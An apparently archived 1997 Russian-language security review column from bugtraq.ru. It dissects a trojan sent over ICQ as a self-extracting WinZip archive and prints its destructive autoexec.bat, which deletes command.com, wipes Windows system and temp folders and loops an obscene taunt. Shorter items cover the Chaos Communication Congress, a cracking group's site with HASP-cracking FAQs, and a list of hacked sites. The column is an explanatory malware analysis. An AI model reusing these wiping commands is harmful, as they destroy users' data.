 |  |
https://bugtraq.ru/review/archive/1997/30-12-97.html |
|
|||
|
|
|
||
| https://bugtraq.ru/review/archive/1997/30-12-97.html |
||||
| ||||
30 декабря 1997, #5
Получил я на той неделе по ICQ некую программку - D&mD.exe, автор которой (UIN 5534022 с очень грамотным ником :) ) утверждал, что сие есть новый страшный вирус-мутант, который не ловится никакими сканерами, имеет чертовски сложную структуру и портит не только софт, но и хард - "Once activated, the person will have to buy a new computer!"
Поскольку до сих пор все мое знакомство с подобными штуками было ограничено слухами об ужасных утилитах, прожигающих монитор или снимающих стружку с жесткого диска, я заинтересовался. При ближайшем рассмотрении сей шедевр оказался банальным self-extracting WinZIP-файлом, в который были запакованы файлы autoexec.bat, 0.COM, BOOT.COM, SCREAMER.EXE и v.pif.
Дальше все было совсем просто - в 0.com лежали вызовы команд erase, copy и rename, сносящие и подменяющие основные (по мнению автора) файлы на компьютере жертвы. Дело завершало копирование заботливо подготовленного autoexec.bat:
echo off c:\windows\boot.com erase c:\command.com erase c:\windows\screamer.exe erase c:\windows\boot.com echo Please wait while setup continues... rename c:\windows\system temporary deltree /y c:\windows\temporary deltree /y c:\windows\temp deltree /y c:\temporary cls 1: echo HaHa! echo Your system has been FUCKED!! echo FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU goto 1
Как известно, WinZip Self Extractor позволяет подготовить архив, после распаковки которого будет автоматически запущена некая программа - обычно этим пользуются при упаковке дистрибутивов, но, как показала практика, этому можно найти и более веселое применение. Комментарии, думаю, излишни.
А в Гамбурге с 27 по 29 декабря проходил 14-й европейский хакерский конгресс (точнее, Chaos Communication Congress), который ежегодно устраивает Chaos Computer Club. Линки в основном для владеющих немецким, остальные могут получить лишь общее впечатление. Информацией поделился Werwolf, и я надеюсь на его более подробный рассказ об этом мероприятии.
На сайте хакерско-пиратской группы UCL представлены краткая история группы, странички некоторых ее членов, список последних достижений. FAQ для чайников:"Как ломать?", FAQ по взлому HASP. Сайт недавно подвергся переделке, улучшилось оформление, потерялась часть ссылок...
Напоследок - табличка по хакнутым в 1997 году сайтам. Больше всего не повезло доменам .com, .ru места в таблице не нашлось. Не было или никто об этом не знает ? Встретимся в следующем году. С наступающим!
| « | » | |
|
|
|